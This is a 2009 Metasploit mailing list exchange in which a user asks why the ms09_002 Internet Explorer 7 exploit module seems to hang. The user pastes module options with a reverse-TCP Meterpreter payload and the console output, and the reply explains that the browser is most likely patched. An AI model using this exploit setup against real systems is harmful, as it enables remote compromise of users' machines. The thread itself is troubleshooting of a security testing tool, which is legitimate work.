Metasploit mailing list archives
use of ms09_002 and xml_corruption modules
From: natron at invisibledenizen.org (natron)
Date: Wed, 1 Apr 2009 13:09:43 -0500
It's not hanging. The module's letting you know a request came in and it responded with the html code. Depending on your payload, if the exploit was successful, you would see further messages about the additional stages being downloaded and then dumped at the payload prompt. What you're seeing is what you would see if the browser was not vulnerable to either of those exploits. You have most likely already patched. On Wed, Apr 1, 2009 at 1:07 PM, jeffs <jeffs at speakeasy.net> wrote:
When I use either of these modules 'sploit just hangs on the last line -- am I to presume that means my version of IE7 is not vulnerable or do I perchance have a wrong setting below? thanks. Same result with xml_corruption.. Module options: ?Name ? ? Current Setting ?Required ?Description ? ? ? ? ? ? ?---- ? ? --------------- ?-------- ?----------- ? ? ? ? ? ? ? ? ? ? ? ? ?SRVHOST ?0.0.0.0 ? ? ? ? ?yes ? ? ? The local host to listen on. ? ? ? ? ? ? ? ? ? ? ? ? ?SRVPORT ?8080 ? ? ? ? ? ? yes The local port to listen on. ? ? ? ? ? ? ? ? ? ? ? ? ?SSL ? ? ?false ? ?no ? ? ? ?Use SSL ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?URIPATH ?test ? ? ? ? ? ? no ? ? ? ?The URI to use for this exploit (default is random) Payload options (windows/reflectivemeterpreter/reverse_tcp): ?Name ? ? ?Current Setting ?Required ?Description ?---- ? ? ?--------------- ?-------- ?----------- ?EXITFUNC ?process ? ? ? ? ?yes ? ? ? Exit technique: seh, thread, process ?LHOST ? ? 192.168.1.101 ? ?yes ? ? ? The local address ?LPORT ? ? 4444 ? ? ? ? ? ? yes ? ? ? The local port Exploit target: ?Id ?Name ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?-- ?---- ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?0 ? Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 msf exploit(ms09_002_memory_corruption) > exploit [*] Exploit running as background job. msf exploit(ms09_002_memory_corruption) > [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/test [*] ?Local IP: http://192.168.1.101:8080/test [*] Server started. [*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.1.100:1704... ?<----- just hangs here _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- use of ms09_002 and xml_corruption modules jeffs (Apr 01)
- use of ms09_002 and xml_corruption modules natron (Apr 01)